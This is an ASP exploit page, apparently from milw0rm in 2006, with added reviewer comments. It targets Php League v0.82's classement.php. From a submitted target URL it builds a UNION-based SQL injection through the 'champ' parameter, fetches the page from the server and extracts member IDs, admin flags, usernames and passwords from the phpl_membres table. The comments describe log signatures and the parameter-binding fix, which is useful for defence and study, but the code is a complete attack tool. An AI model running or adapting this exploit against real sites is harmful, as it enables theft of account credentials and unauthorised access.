% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
' Reviewer notes on the page setup (the three one-line blocks above):
'  - Response.Buffer = True turns on output buffering, so the Response.Redirect calls further
'    down can still run after static page text has been emitted.
'  - On Error Resume Next suppresses every runtime error for the rest of the page; a failed
'    outbound request or a reply without the expected marker therefore produces no error
'    output at all.
'  - Server.ScriptTimeout = 100 lets the page run for up to 100 seconds.
' Reviewer notes on scope: going by this header and the request path built further down, the
' affected component is /consult/classement.php in Php League v0.82 and the injected parameter
' is "champ". The page names no fixed version and no advisory identifier.
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
Php Leaguev0.82 (classement.php)
Remote SQL Injection Exploit
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1] |
|
<%
' Print the validation message that matches the "islem" code in the query string.
' The codes hata1/hata2/hata3 are set by the redirects to exploit2.asp issued by the form
' handler; any other value prints nothing here. Only fixed strings are written, so nothing
' from the request is echoed back.
islem = Request.QueryString("islem")
Select Case islem
Case "hata1"
' Target field was submitted empty.
Response.Write "There is a problem! Please complete to the whole spaces"
Case "hata2"
' Target field contained the word "union".
Response.Write "There is a problem! Please right character use"
Case "hata3"
' Target field did not contain "http://".
Response.Write "There is a problem! Add ""http://"""
End Select
%>
<%
' Form handler, reached when the query string carries islem=get.
' It concatenates one GET URL from the posted target and id, requests it from this server,
' and slices a fixed window out of the reply.
'
' What the request looks like on the receiving side (useful for log review):
'   path      /consult/classement.php
'   parameter champ, starting with a single quote and followed by a URL-encoded
'             "union select 0,0,concat(...)" over table phpl_membres
'   columns   id, admin, pseudo, mot_de_passe
'   labels    the char() runs decode to "UserID:", "Admin?:", "UserName:" and "Pass:" + CRLF
'   tail      "where id like <posted id>" followed by "/*"
' A champ value containing a quote, "union", "select" and a trailing "/*" in access logs for
' that path matches this script's request shape.
'
' NOTE(review): on the application side this presumes "champ" is placed into a SQL statement
' without escaping (per the page title). The usual remedy is to bind the value as a query
' parameter or, if it selects a column, to accept only a fixed list of expected names; the
' vulnerable PHP source is not shown here, so confirm against it.
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
' The posted "id" field is appended to the URL as-is; nothing in this page validates it.
string12=Request.Form("id")
string13="/*"
' The posted "text1" field is the base URL of the target installation.
targettext = Request.Form("text1")
' Both searches start at position 1 and use compare mode 1 (text compare, case-insensitive).
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
' Validation of the target field only: empty -> hata1, contains "union" -> hata2,
' lacks "http://" -> hata3. Each failure redirects back to exploit2.asp with that code.
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
' Full request URL: posted base URL + fixed path and query + posted id + "/*".
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
' take(come): fetch the URL in "come" with a synchronous GET through Microsoft.XMLHTTP and
' return the response body as text. The request originates from the server hosting this page.
' No status check is made, and with On Error Resume Next in force a failed request simply
' leaves the return value unset.
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
' Third argument FALSE = not asynchronous, so the call blocks until the reply arrives.
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
' Locate the literal "0 0/" in the reply and keep 90 characters starting 5 positions after
' the match position. InStr returns 0 when the marker is absent, in which case the window
' starts at position 5 of the reply.
' NOTE(review): presumably "0 0/" is how the two constant columns render in the target page
' (TODO confirm against the application's HTML).
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
ajann
<%
' NOTE(review): "username" is assigned above but never written out in the lines visible
' here; the markup between the two script blocks appears to have been lost in extraction.
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]